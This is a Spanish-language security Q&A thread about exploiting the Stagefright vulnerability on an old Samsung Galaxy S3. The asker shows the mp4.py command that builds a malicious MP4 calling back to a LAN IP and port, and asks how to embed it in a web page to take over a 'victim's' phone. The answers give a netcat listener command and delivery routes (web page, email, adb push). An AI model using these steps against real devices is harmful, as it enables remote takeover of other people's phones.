Stagefright en Samsung Galaxy S3 con JB 4.3 [cerrado]

2

Últimamente he investigado mucho sobre Stagefright y se ha confirmado que muchos modelos de teléfonos que ejecutan Android Lollipop y menores son susceptibles a la explotación.

Entonces, dado que mi S3 sí se volvió vulnerable al exploit, usé Zimperium's La aplicación Stagefright Detector decidí probarlo.

Descargué el código del escenario de Joshua Drake ( mp4.py ) y logré crear el archivo MP4 malicioso ejecutándolo:

python mp4.py -c 192.168.x.x -p 4444

c para LAN IP

p para el número de puerto

Ahora, muchos tutoriales en línea dicen que antes de enviar el archivo MP4 a través de MMS al teléfono de destino, debo configurar una puerta trasera utilizando netcat. Sin embargo, he descubierto que crear una puerta trasera utilizando metasploit es mucho más efectivo para obtener el control total sobre el teléfono.

He oído que también puede incrustar el MP4 u otros archivos multimedia en una página web, de modo que cuando una víctima visita la página web, puede obtener el control total sobre el teléfono de la misma manera que se mencionó anteriormente.

Entonces, ¿cómo podría lograrse esto?

    
pregunta Josephson47 27.02.2017 - 08:14
fuente

2 respuestas

2

Debe instalar netcat en su PC, no en el dispositivo. Configure este netcat en el modo de escucha para el puerto elegido:

nc -lp 4444

El dispositivo obtendrá su netcat reproduciendo el archivo de video falsificado. No necesita MMS para que el video se envíe al teléfono. Puede incrustar el video en una página web, enviarlo por correo electrónico o simplemente usar el comando adb push para almacenarlo en el dispositivo. Después de eso, use el reproductor de video estándar para reproducir el video, y tendrá control sobre el dispositivo desde la línea de comando de su PC.

    
respondido por el Alex Cohn 27.02.2017 - 15:10
fuente
2

Prueba el módulo Metasploit: enlace

También, del PoC original de Josua Drake enlace

  

Primero, no es un exploit genérico. Sólo se ha probado para que funcione en un solo modelo de dispositivo. Mi objetivo era el dispositivo Galaxy Nexus con Android 4.0.4 que contenía solo una implementación parcial de ASLR.

Para usarlo en otro dispositivo, debe conocer las direcciones de la función libc.so para los dispositivos de la cadena ROP.

    
respondido por el J.A.K. 27.02.2017 - 20:54
fuente

Lea otras preguntas en las etiquetas